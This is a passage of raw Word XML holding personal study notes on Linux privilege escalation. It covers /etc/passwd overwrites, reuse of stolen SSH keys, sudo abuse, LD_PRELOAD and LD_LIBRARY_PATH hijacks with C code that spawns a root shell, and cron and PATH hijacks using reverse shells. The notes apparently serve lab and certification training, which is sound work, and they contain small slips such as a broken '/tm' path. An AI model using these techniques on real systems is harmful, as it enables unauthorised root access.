      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E142B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Writable /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDC9EE2" w14:textId="64752EF8" w:rsidR="009E142B" w:rsidRDefault="009E142B" w:rsidP="009E142B">
      <w:r>
        <w:t>On kali, generate new hash with new password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C83073" w14:textId="33F13F71" w:rsidR="009E142B" w:rsidRDefault="009E142B" w:rsidP="009E142B">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> passwd ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>newpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF77847" w14:textId="7E97C76B" w:rsidR="009E142B" w:rsidRDefault="009E142B" w:rsidP="009E142B">
      <w:r>
        <w:t>Copy entire hash and use it to replace the root user’s x in /etc/passwd/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCA4038" w14:textId="7E615975" w:rsidR="009E142B" w:rsidRDefault="009E142B" w:rsidP="009E142B">
      <w:r>
        <w:t xml:space="preserve">If can only append to the file, copy the root entry and paste it at the bottom. Then change the name to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>newroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and replace x with the hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE2717" w14:textId="29642303" w:rsidR="009E142B" w:rsidRDefault="009E142B" w:rsidP="009E142B">
      <w:r>
        <w:t xml:space="preserve">Then use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to change to root (or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>newroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8F7534" w14:textId="636B067E" w:rsidR="00CB2C86" w:rsidRPr="009E142B" w:rsidRDefault="009E142B" w:rsidP="00CB2C86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Files with credentials in them (also software information)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BA448E" w14:textId="09C2C26F" w:rsidR="009E142B" w:rsidRDefault="009E142B" w:rsidP="00CB2C86">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>linPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will highlight </w:t>
      </w:r>
      <w:r w:rsidR="000245EB">
        <w:t>files such as history, backups, and SSH files. But look around for .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000245EB">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000245EB">
        <w:t xml:space="preserve"> folders. If </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000245EB">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000245EB">
        <w:t xml:space="preserve"> private key is found, copy it to kali and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA9C71D" w14:textId="6D822EF6" w:rsidR="000245EB" w:rsidRDefault="000245EB" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 600 key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36507FDD" w14:textId="143A45CB" w:rsidR="000245EB" w:rsidRDefault="000245EB" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@RHOST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4739006D" w14:textId="4E8BA8FF" w:rsidR="000245EB" w:rsidRPr="000245EB" w:rsidRDefault="000245EB" w:rsidP="000245EB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Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52EA7295" w14:textId="408915A9" w:rsidR="00230716" w:rsidRDefault="00230716" w:rsidP="000245EB">
      <w:r>
        <w:t xml:space="preserve">Check </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l first. If I can run as another user, can do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u user ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EAEC4D" w14:textId="7C909D2B" w:rsidR="00CB2C86" w:rsidRDefault="000245EB" w:rsidP="000245EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> identifies commands that can be run as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> without a password. Cross reference these with </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00072086">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gtfobins.github.io/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> to find escalation method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739A23BA" w14:textId="1C2639B6" w:rsidR="000245EB" w:rsidRDefault="000245EB" w:rsidP="000245EB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0180AD2C" wp14:editId="0369D0FF">
            <wp:extent cx="5731510" cy="267081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6775F" w14:textId="06720673" w:rsidR="000245EB" w:rsidRDefault="0059023C" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">Even if not on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gtfobins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, still look up if possible </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (such as apache2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5552984A" w14:textId="3DC99198" w:rsidR="00CB2C86" w:rsidRPr="0059023C" w:rsidRDefault="005B627C" w:rsidP="00CB2C86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LD_PRELOAD e</w:t>
      </w:r>
      <w:r w:rsidR="0059023C" w:rsidRPr="0059023C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nvironment variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3FE57B" w14:textId="28D8B2EE" w:rsidR="0059023C" w:rsidRDefault="0059023C" w:rsidP="00CB2C86">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shows if LD_PRELOAD is an environment variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5513C7" w14:textId="5D51E7FA" w:rsidR="0059023C" w:rsidRDefault="0059023C" w:rsidP="00CB2C86">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A3D4B3F" wp14:editId="43A1FF6C">
            <wp:extent cx="5731510" cy="681355"/>
            <wp:effectExtent l="0" t="0" r="254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9A131" w14:textId="312CC53A" w:rsidR="0059023C" w:rsidRDefault="0059023C" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">If so, create a file called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>preload.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D971ED5" w14:textId="3B1E3544" w:rsidR="0059023C" w:rsidRDefault="0059023C" w:rsidP="00CB2C86">
      <w:r>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>#include &lt;sys/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>types.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6641BF" w14:textId="69CB1029" w:rsidR="0059023C" w:rsidRDefault="0059023C" w:rsidP="0059023C">
      <w:r>
        <w:t>void _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 {</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unsetenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“LD_PRELOAD”);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setresuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0,0,0);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        system(“/bin/bash -p”);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E37D15C" w14:textId="6CF497B7" w:rsidR="0059023C" w:rsidRDefault="0059023C" w:rsidP="0059023C">
      <w:r>
        <w:t>Then compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D28A9" w14:textId="1B86412D" w:rsidR="005B627C" w:rsidRDefault="005B627C" w:rsidP="0059023C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fPIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -shared -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nostartfiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o /tm/preload.so </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>preload.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="067BE72C" w14:textId="55615635" w:rsidR="005B627C" w:rsidRDefault="005B627C" w:rsidP="0059023C">
      <w:r>
        <w:t xml:space="preserve">And run this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with any allowed command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123504C0" w14:textId="4C136B96" w:rsidR="005B627C" w:rsidRDefault="005B627C" w:rsidP="0059023C">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LD_PRELOAD=/tmp/preload.so &lt;command&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C68E5F3" w14:textId="288C1F3F" w:rsidR="005B627C" w:rsidRPr="0059023C" w:rsidRDefault="005B627C" w:rsidP="005B627C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LD_LIBRARY_PATH e</w:t>
      </w:r>
      <w:r w:rsidRPr="0059023C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nvironment variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4A6C1F" w14:textId="77777777" w:rsidR="005B627C" w:rsidRDefault="005B627C" w:rsidP="005B627C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shows if LD_PRELOAD is an environment variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E381DBA" w14:textId="4DE2DE01" w:rsidR="0059023C" w:rsidRDefault="005B627C" w:rsidP="00CB2C86">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="136B987E" wp14:editId="4E9BF6A0">
            <wp:extent cx="5731510" cy="681355"/>
            <wp:effectExtent l="0" t="0" r="254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204B4" w14:textId="38569F47" w:rsidR="005B627C" w:rsidRDefault="005B627C" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">Run the following against any of the allowed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E293D8F" w14:textId="0CC6F539" w:rsidR="005B627C" w:rsidRDefault="005B627C" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ldd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> FULLPATH/COMMAND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA5237" w14:textId="3E07083C" w:rsidR="005B627C" w:rsidRDefault="005B627C" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">It will list shared objects. Pick one to replace, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> libcrypt.so</w:t>
      </w:r>
      <w:r w:rsidR="00191B6C">
        <w:t>.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AEEA4F" w14:textId="5D4201BE" w:rsidR="005B627C" w:rsidRDefault="005B627C" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">Create a file called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>library_path.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485428C2" w14:textId="692A1575" w:rsidR="005B627C" w:rsidRDefault="005B627C" w:rsidP="005B627C">
      <w:r>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E862224" w14:textId="36BEB06D" w:rsidR="005B627C" w:rsidRDefault="005B627C" w:rsidP="005B627C">
      <w:r>
        <w:t xml:space="preserve">static void </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hijack(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) __attribute</w:t>
      </w:r>
      <w:r w:rsidR="00191B6C">
        <w:t>__((constructor));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC84A6" w14:textId="173484B0" w:rsidR="005B627C" w:rsidRDefault="005B627C" w:rsidP="005B627C">
      <w:r>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00191B6C">
        <w:t>hijack</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unsetenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“LD_</w:t>
      </w:r>
      <w:r w:rsidR="00191B6C">
        <w:t>LIBRARY_PATH</w:t>
      </w:r>
      <w:r>
        <w:t>”);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setresuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0,0,0);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        system(“/bin/bash -p”);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7490616D" w14:textId="77777777" w:rsidR="00191B6C" w:rsidRDefault="00191B6C" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">Compile into a shared object with the same name as the one found earlier, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> libcrypt.so.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA25812" w14:textId="77777777" w:rsidR="00191B6C" w:rsidRDefault="00191B6C" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o libcrypt.so.1 -shared -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fPIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>library_path.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7315C8EF" w14:textId="77777777" w:rsidR="00191B6C" w:rsidRDefault="00191B6C" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">Then use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the command that was used earlier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014CD7A" w14:textId="77777777" w:rsidR="00191B6C" w:rsidRDefault="00191B6C" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LD_LIBRARY_PATH=. &lt;command&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291B8B20" w14:textId="79824230" w:rsidR="00191B6C" w:rsidRPr="00E37457" w:rsidRDefault="00191B6C" w:rsidP="00191B6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Cron jobs (processes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B5213F" w14:textId="0524C372" w:rsidR="00191B6C" w:rsidRPr="002F38F6" w:rsidRDefault="00517B0E" w:rsidP="00191B6C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Writable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> job run by root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9D30E7" w14:textId="77777777" w:rsidR="00517B0E" w:rsidRDefault="00517B0E" w:rsidP="00191B6C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will identify these. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551052A8" w14:textId="75CCD49B" w:rsidR="00517B0E" w:rsidRDefault="00517B0E" w:rsidP="00191B6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E0525A2" wp14:editId="3681A446">
            <wp:extent cx="3181350" cy="4000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9BF26" w14:textId="5569C0A5" w:rsidR="005B627C" w:rsidRDefault="00517B0E" w:rsidP="00191B6C">
      <w:r>
        <w:t>If found, locate the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3074F4E6" w14:textId="2ECD27F6" w:rsidR="00517B0E" w:rsidRDefault="00517B0E" w:rsidP="00191B6C">
      <w:r>
        <w:tab/>
        <w:t>locate &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4524DDB1" w14:textId="45971BFE" w:rsidR="005B627C" w:rsidRDefault="00517B0E" w:rsidP="00CB2C86">
      <w:r>
        <w:t>Check permissions to make sure it’s writable and overwrite it with a reverse shell (of the filetype if possible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5119A93A" w14:textId="401D5357" w:rsidR="00517B0E" w:rsidRDefault="00517B0E" w:rsidP="00CB2C86">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Then listen on kali and wait for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40130114" w14:textId="47547B47" w:rsidR="00517B0E" w:rsidRPr="00517B0E" w:rsidRDefault="00517B0E" w:rsidP="00CB2C86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00517B0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PATH environment variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0A2ECF" w14:textId="2F97C37F" w:rsidR="00517B0E" w:rsidRDefault="00517B0E" w:rsidP="00CB2C86">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will identify if a writable directory is included in the path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C33BA9F" w14:textId="7D192138" w:rsidR="00517B0E" w:rsidRDefault="00517B0E" w:rsidP="00CB2C86">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="481C5914" wp14:editId="1BD8ECB6">
            <wp:extent cx="5731510" cy="80010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E813D" w14:textId="3A143526" w:rsidR="00517B0E" w:rsidRDefault="00517B0E" w:rsidP="00CB2C86">
      <w:r>
        <w:t>This example shows that /home/user is first in the PATH (can still try if not first) and overwrite.sh does not have an absolute path, which is necessary. So, create a new (executable) overwrite.sh in /home/user that contains a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447C77A" w14:textId="0C31883E" w:rsidR="00517B0E" w:rsidRDefault="00517B0E" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">Then listen on kali and wait for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63446D44" w14:textId="1E376BB2" w:rsidR="00517B0E" w:rsidRPr="0055113D" w:rsidRDefault="0055113D" w:rsidP="00CB2C86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0055113D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wildcards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2B4702" w14:textId="7D63451B" w:rsidR="0055113D" w:rsidRDefault="0055113D" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">First, show the contents of readable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> jobs</w:t>
      </w:r>
      <w:r w:rsidR="00E41059">
        <w:t xml:space="preserve"> (also need writable directory in PATH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633FAB41" w14:textId="5883272A" w:rsidR="0055113D" w:rsidRDefault="0055113D" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
        <w:t>locate &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A826D78" w14:textId="7F74C9BC" w:rsidR="0055113D" w:rsidRDefault="0055113D" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
        <w:t>cat &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C22F7" w14:textId="4305FF5C" w:rsidR="0055113D" w:rsidRDefault="0055113D" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">If there is a wildcard character * in the file, check which command is using it (at the start of the line) and search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gtfobins</w:t>
      </w:r>
